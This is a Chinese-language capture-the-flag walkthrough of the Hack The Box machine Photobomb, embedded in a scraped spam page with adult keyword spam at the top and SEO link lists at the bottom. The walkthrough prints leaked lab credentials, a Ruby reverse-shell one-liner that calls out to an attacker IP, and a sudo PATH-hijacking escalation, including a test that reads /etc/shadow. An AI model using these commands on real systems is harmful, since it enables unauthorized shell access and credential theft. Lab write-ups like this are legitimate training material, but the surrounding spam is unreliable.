国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

基金管理公司司網(wǎng)站建設(shè)要求國際新聞今天

基金管理公司司網(wǎng)站建設(shè)要求,國際新聞今天,個人介紹網(wǎng)頁,外包網(wǎng)站開發(fā)HTB-Photobomb信息收集開機(jī)提權(quán)對于問題的思考信息收集 端口掃描 目標(biāo)首頁 有一個http Authorization 目錄掃描 在查看源碼的時候發(fā)現(xiàn)了一個js文件。 并且發(fā)現(xiàn)了訪問不存在的目錄會出現(xiàn)錯誤提示。 通過搜索得知 Sinatra 是一個基于 Ruby 語言的 DSL(領(lǐng)域…

在這里插入圖片描述

HTB-Photobomb

  • 信息收集
  • 開機(jī)
  • 提權(quán)
  • 對于問題的思考

信息收集

端口掃描
在這里插入圖片描述

目標(biāo)首頁
在這里插入圖片描述
有一個http Authorization

目錄掃描
在這里插入圖片描述
在這里插入圖片描述

在查看源碼的時候發(fā)現(xiàn)了一個js文件。
在這里插入圖片描述
在這里插入圖片描述
并且發(fā)現(xiàn)了訪問不存在的目錄會出現(xiàn)錯誤提示。
在這里插入圖片描述
通過搜索得知

Sinatra 是一個基于 Ruby 語言的 DSL(領(lǐng)域?qū)僬Z言),可以輕松、快速的創(chuàng)建 web 應(yīng)用。-------Sinatra 中文文檔

通過上面發(fā)現(xiàn)了http Authorization的登陸憑證pH0t0:b0Mb!,使用憑證登錄。
在這里插入圖片描述

登陸進(jìn)去沒有發(fā)現(xiàn)什么,決定開始第二次信息收集,沒錯,沒有額外收獲。對其下載功能使用bp,能看見三個參數(shù)。

在這里插入圖片描述
估計突破口在這三個參數(shù)當(dāng)中,誰知道呢,因為前面知道Sinatra,所以首先考慮ruby,經(jīng)過簡單測試發(fā)現(xiàn)突破點應(yīng)在filetype,并且無法正確回彈。

開機(jī)

沒關(guān)系,至少證明我應(yīng)該找到方向了,但是為什么會回彈沒有完全成功。不會防火墻攔截了吧。更換了一個ruby的reshell腳本。

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.9",1234))'

在這里插入圖片描述

提權(quán)

通過sudo -l能發(fā)現(xiàn)一個文件。
在這里插入圖片描述
文件內(nèi)容與下,最重要的應(yīng)該是最后一句。在source_images目錄里找到所有jpg文件并且給予root:root。
在這里插入圖片描述
立即想到的方法是通過這個腳本修改所屬者和組的權(quán)限,使用bash -p選項將root組添加至wizard用戶組。似乎不行。
在這里插入圖片描述

雖然在hacktrick上找到了可能能用的方法,但是我沒研究出來。在這里插入圖片描述
又出現(xiàn)問題了,大概率是用法不對。
在這里插入圖片描述

因為腳本使用的find命令,注意這個find命令并不是絕對路徑。
在這里插入圖片描述
又因為系統(tǒng)環(huán)境變量PATH里面有/usr/bin,所以我們能夠直接用find調(diào)用/usr/bin/find。
在這里插入圖片描述
如果我對系統(tǒng)變量進(jìn)行修改,使之find為我們自己創(chuàng)建的一個同名文件。

在這里插入圖片描述
接著要做的就是把/tmp目錄添加到系統(tǒng)環(huán)境變量里。
在這里插入圖片描述

PATH=/tmp:$PATH

在這里插入圖片描述
然后執(zhí)行腳本發(fā)現(xiàn)沒有作用,為什么呢。
在這里插入圖片描述
然后嘗試以下方式能成功,這又是為什么。

在這里插入圖片描述

對于問題的思考

為了知道那兩個為什么,我做了個實驗。tee.sh里面只有id命令,然后當(dāng)前目錄下有一個id同名文件,在修改系統(tǒng)環(huán)境變量命令后面加上要執(zhí)行的腳本,就會出現(xiàn)要執(zhí)行的腳本使用前面系統(tǒng)環(huán)境變量里面的id文件(也就是當(dāng)前目錄下的id)。

id內(nèi)容如下。

在這里插入圖片描述

tee.sh的內(nèi)容為。
在這里插入圖片描述
先分開運行看看。能看到加入環(huán)境變量前后id的命令發(fā)生了改變,并且再用sudo會發(fā)現(xiàn)tee.sh文件內(nèi)的id是查看用戶(組)的命令,而不是cat /etc/shadow。
在這里插入圖片描述

這次加上合著一起用??梢钥吹绞褂胹udo執(zhí)行了當(dāng)前目錄文件id的cat /etc/shadow。
在這里插入圖片描述

也就是說如果需要讓腳本內(nèi)的命令以某個路徑下的同名命令替換運行并以sudo權(quán)限運行的話就需要sudo PATH:somepath:$PATH somescript.sh。至于為什么,我覺得以我目前的水平只能認(rèn)為這可能是一種固定的使用方式,至于真的是否如此,只有等日后探究真相。

http://aloenet.com.cn/news/47018.html

相關(guān)文章:

  • wordpress扒站工具北京網(wǎng)站制作公司
  • 網(wǎng)站建設(shè)價錢差異外貿(mào)接單平臺哪個最好
  • 做網(wǎng)站如何導(dǎo)入信用卡付款一個產(chǎn)品的市場營銷策劃方案
  • ??诰W(wǎng)站開發(fā)公司電話建立一個網(wǎng)站的費用
  • 杭州濱江網(wǎng)站建設(shè)公司信息流優(yōu)化師面試常見問題
  • go 是做網(wǎng)站的嗎廣州seo推薦
  • 網(wǎng)站開發(fā)知識體系推廣普通話的意義簡短
  • 尋花問柳專注做一家男人愛的網(wǎng)站百度云網(wǎng)盤資源搜索
  • 網(wǎng)絡(luò)營銷做私活網(wǎng)站智慧軟文發(fā)稿平臺官網(wǎng)
  • asp.net 網(wǎng)站備份免費域名注冊網(wǎng)站
  • 做網(wǎng)站抄代碼免費seo軟件
  • 建設(shè)網(wǎng)站制作網(wǎng)站營銷方案模板
  • 大連今天最新通知電商運營seo
  • 哈爾濱網(wǎng)站設(shè)計有哪些步驟寧波網(wǎng)站推廣聯(lián)系方式
  • 企業(yè)網(wǎng)站基本信息早教優(yōu)化深圳seo
  • 福建省做鞋批發(fā)網(wǎng)站百度開放云平臺
  • 官方網(wǎng)站首頁在線seo推廣軟件
  • php怎么做多個網(wǎng)站網(wǎng)站關(guān)鍵詞快速排名技術(shù)
  • 河北建設(shè)集團(tuán)官網(wǎng)如何做好seo基礎(chǔ)優(yōu)化
  • 一級a做片性視頻.網(wǎng)站在線觀看鄭州seo排名第一
  • 寵物寄養(yǎng)網(wǎng)站畢業(yè)設(shè)計重慶百度關(guān)鍵詞優(yōu)化軟件
  • 網(wǎng)站建設(shè)公司排名搜索大全
  • 鄂州做網(wǎng)站報價谷歌搜索引擎免費入口鏡像
  • 廈門企業(yè)網(wǎng)站建設(shè)補(bǔ)貼百度官網(wǎng)首頁網(wǎng)址
  • 團(tuán)購網(wǎng)站app制作seo網(wǎng)站的優(yōu)化方案
  • 微信公眾號搭建網(wǎng)站seo外推軟件
  • 網(wǎng)站建設(shè)代碼上傳廣州seo服務(wù)公司
  • c 做的web網(wǎng)站怎么發(fā)布網(wǎng)站推廣排名服務(wù)
  • 適合小學(xué)生的最新新聞湖北seo服務(wù)
  • 稅務(wù)網(wǎng)站建設(shè)建議深圳高端網(wǎng)站建設(shè)公司